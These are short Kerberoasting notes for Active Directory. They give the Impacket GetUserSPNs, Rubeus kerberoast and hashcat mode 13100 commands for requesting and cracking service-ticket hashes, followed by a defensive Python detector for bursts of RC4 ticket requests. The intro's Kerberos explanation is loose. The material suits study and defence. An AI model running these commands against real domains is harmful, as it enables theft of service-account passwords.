
Kerberoasting

Basically, Kerberos encrypts TGTs, which are just tickets that the Domain Controller provides to the user, with the Kerberos hash. The TGS is basically a longer hash afterwards. We present the TGS so we can use other services without having to authenticate manually. (NOT AN AD EXPERT, DON'T KILL ME :()

python3 GetUserSPNs.py <DOMAIN/username:password> -dc-ip <ip of domain controller> -request

Also try that's not in Impacket.

Kerberoasting with Rubeus

Rubeus.exe kerberoast

Cracking TGTs

hashcat -m 13100 -a 0 kerberosast.txt rockyou.txt
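
For the defending side, the ticket requests above are recorded on the Domain Controller as Security event 4769, and hashcat mode 13100 only applies to RC4 (etype 0x17) service tickets. The following is an added example, not part of the original notes: it flags a requester who pulls RC4 tickets for several distinct service accounts in a short window. The rows are constructed sample data, and the tuple layout, the threshold of 3 services and the 5-minute window are assumptions to tune for your environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, the ticket type hashcat mode 13100 works on

# Constructed sample rows (not real log data): time, requester, service, etype
EVENTS = [
    ("2024-05-01T10:00:01", "bob@CORP.LOCAL", "svc_sql", "0x17"),
    ("2024-05-01T10:00:03", "bob@CORP.LOCAL", "svc_web", "0x17"),
    ("2024-05-01T10:00:09", "bob@CORP.LOCAL", "svc_backup", "0x17"),
    ("2024-05-01T10:02:00", "alice@CORP.LOCAL", "svc_sql", "0x12"),     # AES256
    ("2024-05-01T10:02:05", "alice@CORP.LOCAL", "FILESRV01$", "0x17"),  # machine account
    ("2024-05-01T09:00:00", "carol@CORP.LOCAL", "svc_sql", "0x17"),
    ("2024-05-01T11:00:00", "carol@CORP.LOCAL", "svc_web", "0x17"),
    ("2024-05-01T14:00:00", "carol@CORP.LOCAL", "svc_backup", "0x17"),
]

def is_candidate(service, etype):
    """RC4 ticket for a user-backed service account (skip machine accounts and krbtgt)."""
    svc = service.lower()
    return int(etype, 16) == RC4_HMAC and not svc.endswith("$") and svc != "krbtgt"

def find_bursts(events, min_services=3, window_minutes=5):
    """Map requester -> sorted services when one requester asked for RC4 tickets
    to at least min_services distinct service accounts inside one time window."""
    window = timedelta(minutes=window_minutes)
    per_user = defaultdict(list)
    for time, user, service, etype in events:
        if is_candidate(service, etype):
            per_user[user].append((datetime.fromisoformat(time), service))
    flagged = {}
    for user, reqs in per_user.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:  # slide the window forward
                start += 1
            services = {svc for _, svc in reqs[start:end + 1]}
            if len(services) >= min_services:
                flagged.setdefault(user, set()).update(services)
    return {user: sorted(svcs) for user, svcs in flagged.items()}

if __name__ == "__main__":
    for user, services in find_bursts(EVENTS).items():
        print(f"{user}: RC4 service tickets for {', '.join(services)}")
```

On the sample rows only bob is flagged: alice's requests are AES or for a machine account, and carol's RC4 requests are spread over five hours.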
